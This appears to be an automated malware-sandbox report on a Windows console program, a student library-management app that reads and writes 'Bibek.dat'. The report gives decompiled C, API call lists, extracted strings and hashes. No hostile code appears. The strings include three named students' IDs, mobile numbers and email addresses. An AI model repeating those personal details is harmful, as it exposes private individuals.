                                                  						do {
                                                  							__eax = E00AD9A54(__edx);
                                                  							__eflags = __esi - __eax;
                                                  						} while (__esi > __eax);
                                                  						__eax = E00AD91C2(0);
                                                  						asm("lock cmpsb");
                                                  						asm("cld");
                                                  						asm("cmpsb");
                                                  						 *(__edi - 0x58ebff4f) =  *(__edi - 0x58ebff4f) | __ah;
                                                  						 *(__edi - 0x58d3ff4f) =  *(__edi - 0x58d3ff4f) & __ah;
                                                  						__eflags =  *((intOrPtr*)(__edi + 0x3be800b1)) - __ah;
                                                  						__eax = E00B17B00(__eflags); // executed
                                                  						E00AF4817(__edx, __esi, __eflags) = 0;
                                                  						__eflags = 0;
                                                  						return 0;
                                                  						goto L15;
                                                  				}
                                                  			}

                                                  Disassembly listing: only the instruction address column (0x00b1a4d0 through 0x00b1a8cc) survived extraction; the instruction text for this function is not present on the page.

                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F5,00000000,?,?,00B17DEB), ref: 00B1A50F
                                                  • SetConsoleCursorPosition.KERNEL32(00000000,?,?,00B17DEB), ref: 00B1A512
                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00B17DEB), ref: 00B1A533
                                                  • SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,00B17DEB), ref: 00B1A536
                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,00B17DEB), ref: 00B1A557
                                                  • SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,?,00B17DEB), ref: 00B1A55A
                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,00B17DEB), ref: 00B1A57B
                                                  • SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,?,?,00B17DEB), ref: 00B1A57E
                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A59F
                                                  • SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A5A2
                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A5C3
                                                  • SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A5C6
                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A5E7
                                                  • SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A5EA
                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A60B
                                                  • SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A60E
                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A62F
                                                  • SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A632
                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A653
                                                  • SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A656
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1A692
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1A695
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1A6CA
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1A6CD
                                                  Strings
                                                  • 3. Sijan Bhandari (066/BCT/537), xrefs: 00B1A810
                                                  • Mobile:9846311430 E-mail:subedi_bibek@yahoo.co.in, xrefs: 00B1A7A4
                                                  • cls, xrefs: 00B1A4F0, 00B1A738
                                                  • Exiting in 3 second...........>, xrefs: 00B1A87C
                                                  • 2. Dinesh Subedi (066/BCT/512), xrefs: 00B1A7C8
                                                  • Mobile:9849516774 E-mail:sijan_nasa@yahoo.com, xrefs: 00B1A834
                                                  • Date and time:%s, xrefs: 00B1A673
                                                  • Mobile:9841569394 E-mail:smokindinesh@gmail.com, xrefs: 00B1A7EC
                                                  • 1. Bibek Subedi (066/BCT/506), xrefs: 00B1A780
                                                  • With the Unexplainable Help of Mr.Ashok Basnet, xrefs: 00B1A858
                                                  • Enter your choice:, xrefs: 00B1A697
                                                  • Programmers...., xrefs: 00B1A75C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ConsoleCursorHandlePosition
                                                  • String ID: Mobile:9841569394 E-mail:smokindinesh@gmail.com$ Mobile:9846311430 E-mail:subedi_bibek@yahoo.co.in$ Mobile:9849516774 E-mail:sijan_nasa@yahoo.com$1. Bibek Subedi (066/BCT/506)$2. Dinesh Subedi (066/BCT/512)$3. Sijan Bhandari (066/BCT/537)$Date and time:%s$Enter your choice:$Exiting in 3 second...........>$Programmers....$With the Unexplainable Help of Mr.Ashok Basnet$cls
                                                  • API String ID: 4283984680-75408317
                                                  • Opcode ID: ed741d8e62f782acc9a0fbd654110f38e1e0879c409bead3187e9dafe6f98cde
                                                  • Instruction ID: 6b24c774fa37f340d4d5185efd937196b7015881e102e231ec6e65cd68ce81c5
                                                  • Opcode Fuzzy Hash: ed741d8e62f782acc9a0fbd654110f38e1e0879c409bead3187e9dafe6f98cde
                                                  • Instruction Fuzzy Hash: 4C81F9B2C4919876CA30B7E6BC0AD8A3E4CDB48374B1542A5F528427F2DEB16454CFB7
                                                  Uniqueness
                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 86%
                                                  			E00B18930(void* __ecx, void* __edx, void* __eflags) {
                                                  				signed int _v8;
                                                  				intOrPtr _v12;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* __ebp;
                                                  				void* _t10;
                                                  				void* _t17;
                                                  				void* _t56;
                                                  				void* _t57;
                                                  				void* _t58;
                                                  				void* _t59;
                                                  				short _t60;
                                                  				void* _t62;
                                                  				void* _t63;
                                                  				signed int _t65;
                                                  				void* _t67;
                                                  				void* _t71;
                                                  
                                                  				_t61 = __edx;
                                                  				_t59 = __ecx;
                                                  				_t64 = 0;
                                                  				_v12 = 0;
                                                  				E00AE3965(_t57, __edx, _t62, 0);
                                                  				_t63 = GetStdHandle;
                                                  				0xb27e6c->X = 0x10001;
                                                  				_t10 = GetStdHandle(0xfffffff5);
                                                  				_t58 = SetConsoleCursorPosition;
                                                  				SetConsoleCursorPosition(_t10, 0xb27e6c->X);
                                                  				E00AD1080(_t59, "*********************************Book List*****************************", "cls");
                                                  				0xb27e6c->X = 0x20002;
                                                  				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  				_push(" CATEGORY     ID    BOOK NAME     AUTHOR       QTY     PRICE     RackNo ");
                                                  				E00AD1080(_t59);
                                                  				_v8 = 4;
                                                  				 *0xb27ea0 = L00AD9D57("Bibek.dat", "rb");
                                                  				_t17 = E00AF1525(0xb27ec0, 0x6c, 1, _t16);
                                                  				_t71 = _t67 + 0x24;
                                                  				_t3 = _t64 + 3; // 0x3
                                                  				_t60 = _t3;
                                                  				if(_t17 == 1) {
                                                  					do {
                                                  						_t65 = _v8 & 0x0000ffff;
                                                  						0xb27e6c->X = _t60;
                                                  						 *0xb27e6e = _t65;
                                                  						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  						E00AD1080(_t60, "%s",  *0xb27f10);
                                                  						 *0xb27e6e = _t65;
                                                  						0xb27e6c->X = 0x10;
                                                  						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  						E00AD1080(_t60, 0xb22be0,  *0xb27ec0);
                                                  						 *0xb27e6e = _t65;
                                                  						0xb27e6c->X = 0x16;
                                                  						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  						E00AD1080(_t60, "%s", 0xb27ed8);
                                                  						 *0xb27e6e = _t65;
                                                  						0xb27e6c->X = 0x24;
                                                  						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  						E00AD1080(_t60, "%s", 0xb27eec);
                                                  						 *0xb27e6e = _t65;
                                                  						0xb27e6c->X = 0x32;
                                                  						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  						E00AD1080(_t60, 0xb22be0,  *0xb27f00);
                                                  						 *0xb27e6e = _t65;
                                                  						0xb27e6c->X = 0x39;
                                                  						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  						asm("movss xmm0, [0xb27f04]");
                                                  						asm("cvtps2pd xmm0, xmm0");
                                                  						asm("movsd [esp], xmm0");
                                                  						E00AD1080(_t60);
                                                  						 *0xb27e6e = _t65;
                                                  						0xb27e6c->X = 0x45;
                                                  						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  						E00AD1080(_t60, 0xb22be0,  *0xb27f0c);
                                                  						E00AD1080(_t60, "\n\n", "%.2f");
                                                  						_t64 = _v12 +  *0xb27f00;
                                                  						_v8 = _v8 + 1;
                                                  						_v12 = _v12 +  *0xb27f00;
                                                  						_t56 = E00AF1525(0xb27ec0, 0x6c, 1,  *0xb27ea0);
                                                  						_t71 = _t71 + 0x28 - 8 + 0x28;
                                                  						_t60 = 3;
                                                  						_t84 = _t56 - 1;
                                                  					} while (_t56 == 1);
                                                  				}
                                                  				0xb27e6c->X = 0x190003;
                                                  				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  				E00AD1080(_t60, "Total Books =%d", _t64);
                                                  				E00ADA516(_t60, _t61, _t84);
                                                  				0xb27e6c->X = 0x190023;
                                                  				SetConsoleCursorPosition(GetStdHandle(0xfffffff5),  *0xb27e6c);
                                                  				E00AD1080(_t60, " Press ENTER to return to main menu",  *0xb27ea0);
                                                  				do {
                                                  				} while (E00AF4817(_t61, _t64, _t84) != 0xd);
                                                  				return E00B1A4D0(_t58, _t60, _t61, _t63, _t64);
                                                  			}

                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18963
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1896C
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1898D
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18990
                                                  • __fread_nolock.LIBCMT ref: 00B189C4
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B189FC
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B189FF
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18A2E
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18A31
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18A60
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18A63
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18A91
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18A94
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18AC2
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18AC5
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18AF4
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18AF7
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18B33
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18B36
                                                  • __fread_nolock.LIBCMT ref: 00B18B73
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18B9B
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18B9E
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18BCB
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18BCE
                                                  Strings
                                                  • *********************************Book List*****************************, xrefs: 00B1896E
                                                  • Press ENTER to return to main menu, xrefs: 00B18BD0
                                                  • Bibek.dat, xrefs: 00B189AB
                                                  • cls, xrefs: 00B1893B
                                                  • %.2f, xrefs: 00B18B0C
                                                  • Total Books =%d, xrefs: 00B18BA1
                                                  • CATEGORY ID BOOK NAME AUTHOR QTY PRICE RackNo , xrefs: 00B18992
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ConsoleCursorHandlePosition$__fread_nolock
                                                  • String ID: CATEGORY ID BOOK NAME AUTHOR QTY PRICE RackNo $ Press ENTER to return to main menu$%.2f$*********************************Book List*****************************$Bibek.dat$Total Books =%d$cls
                                                  • API String ID: 2024444707-2547792454
                                                  • Opcode ID: a5e89be075d471575457707b37ed203e8c388792e6c7796d58ef6a81041e1fea
                                                  • Instruction ID: 381f15d9218ae83868b17d0015f0af21ba1df3910d7ed210fd4280c97ad991ec
                                                  • Opcode Fuzzy Hash: a5e89be075d471575457707b37ed203e8c388792e6c7796d58ef6a81041e1fea
                                                  • Instruction Fuzzy Hash: FD510372888294BACB20BBE1FC06DAA3A6CEF48750F554285F114533F1DEB15D41CB7A
                                                  Uniqueness
                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 77%
                                                  			E00B1A230(void* __ecx, void* __edx, void* __eflags) {
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				intOrPtr _t35;
                                                  				void* _t36;
                                                  				void* _t51;
                                                  				signed int _t53;
                                                  				void* _t55;
                                                  				void* _t56;
                                                  				void* _t57;
                                                  				void* _t58;
                                                  				void* _t70;
                                                  				void* _t72;
                                                  
                                                  				_t55 = __edx;
                                                  				_t52 = __ecx;
                                                  				_t57 = SetConsoleCursorPosition;
                                                  				_t56 = GetStdHandle;
                                                  				while(1) {
                                                  					E00AE3965(_t51, _t55, _t56, _t57);
                                                  					0xb27e6c->X = 0x50014;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					E00AD1080(_t52, 0xb22b20, "cls");
                                                  					0xb27e6c->X = 0x70014;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					E00AD1080(_t52);
                                                  					0xb27e6c->X = 0x90014;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					E00AD1080(_t52, 0xb22b5c, 0xb22b48);
                                                  					0xb27e6c->X = 0xb0014;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					E00AD1080(_t52);
                                                  					0xb27e6c->X = 0xd0014;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					E00AD1080(_t52, 0xb22b88, 0xb22b74);
                                                  					0xb27e6c->X = 0xf0014;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					E00AD1080(_t52);
                                                  					0xb27e6c->X = 0x110014;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					E00AD1080(_t52, 0xb22bac, 0xb22b98);
                                                  					0xb27e6c->X = 0x130014;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					E00AD1080(_t52);
                                                  					0xb27e6c->X = 0x150014;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					E00AD1080(_t52, 0xb22944, 0xb22bc4);
                                                  					0xb27e6c->X = 0x160014;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					_push("Enter your choice:");
                                                  					E00AD1080(_t52);
                                                  					E00AD10F0(_t52, 0xb22be0, 0xb27f30);
                                                  					_t70 = _t58 + 0x34;
                                                  					_t77 =  *0xb27f30 - 7;
                                                  					if( *0xb27f30 == 7) {
                                                  						E00B1A4D0(_t51, _t52, _t55, _t56, _t57);
                                                  					}
                                                  					_push("cls");
                                                  					E00AE3965(_t51, _t55, _t56, _t57);
                                                  					_t35 = L00AD9D57("Bibek.dat", "ab+");
                                                  					_t72 = _t70 + 0xc;
                                                  					 *0xb27ea0 = _t35;
                                                  					_t36 = E00B18050(_t52, _t55, _t77);
                                                  					_t78 = _t36 - 1;
                                                  					if(_t36 != 1) {
                                                  						break;
                                                  					}
                                                  					_t53 =  *0xb27f30; // 0x0
                                                  					_t1 = (_t53 << 4) -  *0xb27f30 + 0xb26941; // -5615
                                                  					 *0xb27f10 = _t1;
                                                  					E00ADA900(_t55,  *0xb27ea0, 0, 2);
                                                  					L00AE3D2F(0xb27ec0, 0x6c, 1,  *0xb27ea0);
                                                  					E00ADA516((_t53 << 4) -  *0xb27f30, _t55, _t78);
                                                  					0xb27e6c->X = 0xe0015;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					E00AD1080((_t53 << 4) -  *0xb27f30, "The record is sucessfully saved",  *0xb27ea0);
                                                  					0xb27e6c->X = 0xf0015;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5),  *0xb27e6c);
                                                  					_push("Save any more?(Y / N):");
                                                  					E00AD1080(_t52);
                                                  					_t58 = _t72 + 0x28;
                                                  					if(E00AF4817(_t55, _t57, _t78) != 0x6e) {
                                                  						_push("cls");
                                                  						E00AE3965(_t51, _t55, _t56, _t57);
                                                  						_t58 = _t58 + 4;
                                                  					} else {
                                                  						E00B1A4D0(_t51, _t52, _t55, _t56, _t57);
                                                  					}
                                                  				}
                                                  				return _t36;
                                                  			}
                                                  0x00b1a4a5
                                                  0x00b1a4c6

                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F5,00B1A6F5), ref: 00B1A25F
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1A262
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1A283
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1A286
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1A2A7
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1A2AA
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1A2CB
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1A2CE
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1A2EF
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1A2F2
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1A313
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1A316
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1A337
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1A33A
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1A35B
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1A35E
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1A37F
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1A382
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1A3A3
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1A3A6
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1A467
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1A46A
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1A48B
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1A48E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ConsoleCursorHandlePosition
                                                  • String ID: Bibek.dat$Enter your choice:$Save any more?(Y / N):$The record is sucessfully saved$ab+$cls
                                                  • API String ID: 4283984680-3392312719
                                                  • Opcode ID: d15429008446e644eba52114a514e548b2e0bc770887e138c4fb537cbfda184e
                                                  • Instruction ID: 863c7ce785f543cce6ae342447c71ff1aae4579156e235612e4fdd408cb8274a
                                                  • Opcode Fuzzy Hash: d15429008446e644eba52114a514e548b2e0bc770887e138c4fb537cbfda184e
                                                  • Instruction Fuzzy Hash: CE51F8B1C8929476CA30BBE1BD0ED8A3E58DB48368B014291F119533F2DEB16445DFB7
                                                  Uniqueness
                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 93%
                                                  			E00AFE67B(void* __ebx, signed int __edi, void* __esi, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                  				signed int _v8;
                                                  				signed int _v12;
                                                  				struct _SECURITY_ATTRIBUTES* _v16;
                                                  				void* _v20;
                                                  				long _v24;
                                                  				long _v28;
                                                  				struct _PROCESS_INFORMATION _v44;
                                                  				struct _STARTUPINFOW _v112;
                                                  				intOrPtr* _v116;
                                                  				intOrPtr* _v120;
                                                  				intOrPtr* _v124;
                                                  				signed int _t67;
                                                  				intOrPtr* _t73;
                                                  				int _t81;
                                                  				intOrPtr _t82;
                                                  				void* _t92;
                                                  				long _t117;
                                                  				void* _t118;
                                                  				long _t124;
                                                  				void* _t129;
                                                  
                                                  				if(_a8 == 0) {
                                                  					L1:
                                                  					 *((intOrPtr*)(E00AF69E3())) = 0x16;
                                                  					return E00AF68BC() | 0xffffffff;
                                                  				}
                                                  				if(_a12 == 0) {
                                                  					goto L1;
                                                  				}
                                                  				if(_a4 > 4) {
                                                  					 *(E00AF69D0()) =  *_t114 & 0x00000000;
                                                  					goto L1;
                                                  				}
                                                  				_push(__ebx);
                                                  				_push(__edi);
                                                  				_v16 = 0;
                                                  				_v8 = 0;
                                                  				_t67 = E00B0D02C(0, __edi, _a12, _a16,  &_v16,  &_v8);
                                                  				_t124 = __edi | 0xffffffff;
                                                  				if(_t67 == _t124) {
                                                  					L00AF4D62(_v8);
                                                  					_v8 = 0;
                                                  					L00AF4D62(_v16);
                                                  					L9:
                                                  					_t92 = _t124;
                                                  					L35:
                                                  					return _t92;
                                                  				}
                                                  				_v12 = 0;
                                                  				if(E00AFEAB6( &_v12,  &_v20, (_t67 & 0xffffff00 | _a4 != 0x00000004) & 0x000000ff) == 0) {
                                                  					L00AF4D62(_v12);
                                                  					_v12 = 0;
                                                  					L00AF4D62(_v8);
                                                  					_v8 = 0;
                                                  					L00AF4D62(_v16);
                                                  					goto L9;
                                                  				}
                                                  				if(_a4 == 4) {
                                                  					_push(8);
                                                  					_pop(0);
                                                  				}
                                                  				_t73 = E00AF69D0();
                                                  				 *_t73 = 0;
                                                  				_t117 = 0x44;
                                                  				E00AD24C0(_t124,  &_v112, 0, _t117);
                                                  				_v112.cbReserved2 = _v20;
                                                  				_v112.lpReserved2 = _v12;
                                                  				_v112.cb = _t117;
                                                  				_t81 = CreateProcessW(_a8, _v16, 0, 0, 1, 0x400, _v8, 0,  &_v112,  &_v44);
                                                  				_t118 = _v44.hProcess;
                                                  				_t129 = _v44.hThread;
                                                  				if(_t81 == 0) {
                                                  					E00AF69AD(GetLastError());
                                                  					if(_t129 != _t124) {
                                                  						CloseHandle(_t129);
                                                  					}
                                                  					if(_t118 != _t124) {
                                                  						CloseHandle(_t118);
                                                  					}
                                                  					L30:
                                                  					L00AF4D62(_v12);
                                                  					_v12 = _v12 & 0x00000000;
                                                  					L00AF4D62(_v8);
                                                  					_v8 = _v8 & 0x00000000;
                                                  					L00AF4D62(_v16);
                                                  					_t92 = _t124;
                                                  					L34:
                                                  					goto L35;
                                                  				}
                                                  				_t82 = _a4;
                                                  				if(_t82 != 2) {
                                                  					if(_t82 != 0) {
                                                  						if(_t82 != 4) {
                                                  							if(_t129 != _t124) {
                                                  								CloseHandle(_t129);
                                                  							}
                                                  							L00AF4D62(_v12);
                                                  							_v12 = _v12 & 0x00000000;
                                                  							L00AF4D62(_v8);
                                                  							_v8 = _v8 & 0x00000000;
                                                  							L00AF4D62(_v16);
                                                  							_t92 = _t118;
                                                  							goto L34;
                                                  						}
                                                  						if(_t129 != _t124) {
                                                  							CloseHandle(_t129);
                                                  						}
                                                  						if(_t118 != _t124) {
                                                  							CloseHandle(_t118);
                                                  						}
                                                  						_t124 = 0;
                                                  						goto L30;
                                                  					}
                                                  					WaitForSingleObject(_t118, _t124);
                                                  					GetExitCodeProcess(_v44,  &_v24);
                                                  					_v28 = _v24;
                                                  					if(_t129 != _t124) {
                                                  						CloseHandle(_t129);
                                                  					}
                                                  					if(_t118 != _t124) {
                                                  						CloseHandle(_t118);
                                                  					}
                                                  					_t124 = _v28;
                                                  					goto L30;
                                                  				}
                                                  				E00AD916E(0);
                                                  				asm("int3");
                                                  				return L00B0CFB1(_t118, _t124,  *_v124,  *_v120,  *_v116,  *(_v112.cb));
                                                  			}
                                                  0x00afe687
                                                  0x00afe689
                                                  0x00afe68e
                                                  0x00000000
                                                  0x00afe699
                                                  0x00afe6a5
                                                  0x00000000
                                                  0x00000000
                                                  0x00afe6ab
                                                  0x00afe6b2
                                                  0x00000000
                                                  0x00afe6b2
                                                  0x00afe6b7
                                                  0x00afe6b8
                                                  0x00afe6c2
                                                  0x00afe6c9
                                                  0x00afe6cf
                                                  0x00afe6d4
                                                  0x00afe6dc
                                                  0x00afe6e1
                                                  0x00afe6e9
                                                  0x00afe6ec
                                                  0x00afe738
                                                  0x00afe738
                                                  0x00afe881
                                                  0x00000000
                                                  0x00afe882
                                                  0x00afe6f9
                                                  0x00afe715
                                                  0x00afe71a
                                                  0x00afe722
                                                  0x00afe725
                                                  0x00afe72d
                                                  0x00afe730
                                                  0x00000000
                                                  0x00afe735
                                                  0x00afe746
                                                  0x00afe748
                                                  0x00afe74a
                                                  0x00afe74a
                                                  0x00afe751
                                                  0x00afe758
                                                  0x00afe75d
                                                  0x00afe762
                                                  0x00afe76e
                                                  0x00afe775
                                                  0x00afe77f
                                                  0x00afe794
                                                  0x00afe79a
                                                  0x00afe79d
                                                  0x00afe7a2
                                                  0x00afe7ab
                                                  0x00afe7b3
                                                  0x00afe7b6
                                                  0x00afe7b6
                                                  0x00afe7be
                                                  0x00afe7c1
                                                  0x00afe7c1
                                                  0x00afe82c
                                                  0x00afe82f
                                                  0x00afe837
                                                  0x00afe83b
                                                  0x00afe843
                                                  0x00afe847
                                                  0x00afe84c
                                                  0x00afe87d
                                                  0x00000000
                                                  0x00afe880
                                                  0x00afe7c9
                                                  0x00afe7cf
                                                  0x00afe7d7
                                                  0x00afe812
                                                  0x00afe852
                                                  0x00afe855
                                                  0x00afe855
                                                  0x00afe85e
                                                  0x00afe866
                                                  0x00afe86a
                                                  0x00afe872
                                                  0x00afe876
                                                  0x00afe87b
                                                  0x00000000
                                                  0x00afe87b
                                                  0x00afe816
                                                  0x00afe819
                                                  0x00afe819
                                                  0x00afe821
                                                  0x00afe824
                                                  0x00afe824
                                                  0x00afe82a
                                                  0x00000000
                                                  0x00afe82a
                                                  0x00afe7db
                                                  0x00afe7e8
                                                  0x00afe7f1
                                                  0x00afe7f6
                                                  0x00afe7f9
                                                  0x00afe7f9
                                                  0x00afe801
                                                  0x00afe804
                                                  0x00afe804
                                                  0x00afe80a
                                                  0x00000000
                                                  0x00afe80a
                                                  0x00afe889
                                                  0x00afe88e
                                                  0x00afe8b1

                                                  APIs
                                                    • Part of subcall function 00B0D02C: _free.LIBCMT ref: 00B0D04E
                                                  • _free.LIBCMT ref: 00AFE6EC
                                                  • CreateProcessW.KERNEL32 ref: 00AFE794
                                                  • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,00000000,.com), ref: 00AFE7A4
                                                  • __dosmaperr.LIBCMT ref: 00AFE7AB
                                                  • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?,?,?,00000000,.com), ref: 00AFE7B6
                                                  • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?,?,?,00000000,.com), ref: 00AFE7C1
                                                  • WaitForSingleObject.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,00000000,.com), ref: 00AFE7DB
                                                  • GetExitCodeProcess.KERNEL32 ref: 00AFE7E8
                                                  • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?,?,?,00000000,.com), ref: 00AFE7F9
                                                  • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?,?,?,00000000,.com), ref: 00AFE804
                                                  • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?,?,?,00000000,.com), ref: 00AFE819
